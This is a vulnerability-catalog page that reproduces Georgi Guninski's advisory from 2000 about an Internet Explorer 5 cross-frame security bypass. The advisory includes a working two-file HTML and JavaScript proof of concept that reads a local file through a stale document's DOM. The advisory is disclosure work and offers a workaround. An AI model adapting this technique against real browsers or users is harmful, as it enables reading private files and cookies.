Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

ie5.cross-frame.txt

🗓️ 08 Jan 2000 00:00:00Reported by Georgi GuninskiType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 20 Views

Internet Explorer 5 vulnerability allows accessing old document DOM, posing significant security risks.

Code
`Georgi Guninski security advisory #4, 2000  
  
IE 5 security vulnerablity - circumventing Cross-frame security policy  
and accessing the DOM of "old" documents.  
  
Disclaimer:  
The opinions expressed in this advisory and program are my own and not  
of any company.  
The usual standard disclaimer applies, especially the fact that Georgi  
Guninski is not liable for any damages caused by direct or indirect use  
of the information or functionality provided by this program.  
Georgi Guninski, bears NO responsibility for content or misuse of this  
program or any derivatives thereof.  
  
Description:  
Internet Explorer 5.01 under Windows 95 and 5.5 under WinNT 4.0 (suppose  
other versions are also vulnerable)  
allows circumventing "Cross frame security policy" by accessing the DOM  
of "old" documents using <IMG SRC="javascript:..."> and a design flaw in  
IE.  
This exposes the whole DOM of the target document and opens lots of  
security risks.  
This allows reading local files, reading files from any host, window  
spoofing, getting cookies, etc.  
  
Details:  
This is a strange exploit. If you open a new document in a window that  
contains an old document, the old  
document's DOM may be accessed by the new document until the new  
document is completely parsed and displayed.  
Looks like IE keeps the old document until the new document is finally  
parsed and displayed.  
If you put a <IMG SRC="javascript:..."> in the new document, it has  
access to the old document's DOM.  
Examine the source code for more info:  
  
The code is:  
-----------------img2main.html---------------------------------------  
<A HREF="img2.html" TARGET="victim">link</A>  
<SCRIPT>  
alert("Create a short text file C:\\test.txt and it will be read and  
shown in a message box");  
a=window.open("file://c:/test.txt","victim");  
setTimeout("document.links[0].click()",2000);  
</SCRIPT>  
---------------------------------------------------------------------  
  
----------------img2.html--------------------------------------------  
<HTML>  
<IMG SRC="javascript:a=window.open('javascript:alert(\'Here is your  
file: \'+opener.document.body.innerText)');alert('Just an alert, but  
is necessary. Wait a little.')">  
</HTML>  
---------------------------------------------------------------------  
  
  
Demonstration is available at: http://www.nat.bg/~joro/img2main.html  
  
Workaround: Disable Active Scripting  
  
Regards,  
Georgi Guninski  
http://www.nat.bg/~joro  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
08 Jan 2000 00:00Current
7.4High risk
Vulners AI Score7.4
internet explorer 5security vulnerabilitycross-frame security policyaccessing domexploitation risk.
20